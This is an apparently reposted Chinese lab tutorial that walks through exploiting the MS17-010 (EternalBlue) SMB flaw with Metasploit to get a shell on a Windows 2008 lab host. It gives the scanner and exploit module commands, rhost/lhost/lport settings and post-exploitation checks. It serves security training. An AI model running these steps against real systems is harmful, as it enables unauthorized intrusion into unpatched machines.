攻防 | MS17-010利用
本文详细介绍了如何利用MS17-010(永恒之蓝)漏洞通过Metasploit框架获取目标主机权限的实验步骤,包括漏洞检测、参数设置和攻击验证等过程。 2026-1-5 08:22:20 Author: www.freebuf.com(查看原文) 阅读量:3 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

MS17-010利用

【实验目的】

通过对MSF工具的使用,掌握如何利用MS17-010漏洞获取目标主机的权限。

【知识点】

MSF。

【实验原理】

MS17-010漏洞也称作永恒之蓝漏洞,主要是一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。SMB服务可以在Windows与Unix系列OS之间搭起一座桥梁,让资源可以互通。

【实验设备】

  • 网络设备:交换机*1台

  • 主机终端: kali2020主机1台、windows2008主机1台。

【软件工具】

Metasploit

【实验拓扑】

实验拓扑如下图所示。

640e92af8fbf1

【实验思路】

  1. 搜索漏洞利用模块。

  2. 设置参数,发动攻击。

【实验步骤】

1. 进入拓扑图左侧的攻击端主机,用户名/密码:root/com.1234。右击桌面空白处,选择,打开终端,如图所示,输入msfconsole命令,进入MSF控制台,如图3所示。

image-20240512190850247
image-20240614101206895

2. 执行命令search MS17-010,搜索MS17-010漏洞相关模块,如图所示。

image-20240614101335310

3. 执行命令use auxiliary/scanner/smb/smb_ms17_010,查询目标主机是否包含MS17-010漏洞,根据查询结果可知,该目标主机包含MS17-010漏洞,如图所示。

image-20240614101804421

4. 检测到目标主机所包含的漏洞后,执行命令back,返回msf平台。执行命令use exploit/windows/smb/ms17_010_eternalblue,进行漏洞利用。执行命令set rhost 192.168.1.2、set lhost 192.168.1.1、set lport 6666,如图所示。

image-20240614102038773

5. 执行命令show options确认各参数设置无误后,使用run命令发起攻击,攻击成功,如图所示。

image-20240614102129401
image-20240614102221032

6. 执行命令shell,进入windows dos界面,执行命令whoami,查看当前用户权限,执行命令ipconfig,查看到的IP地址正是目标主机的地址,如图所示。

image-20240614102324854

已在FreeBuf发表 0 篇文章

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/endpoint/464967.html
如有侵权请联系:admin#unsafe.sh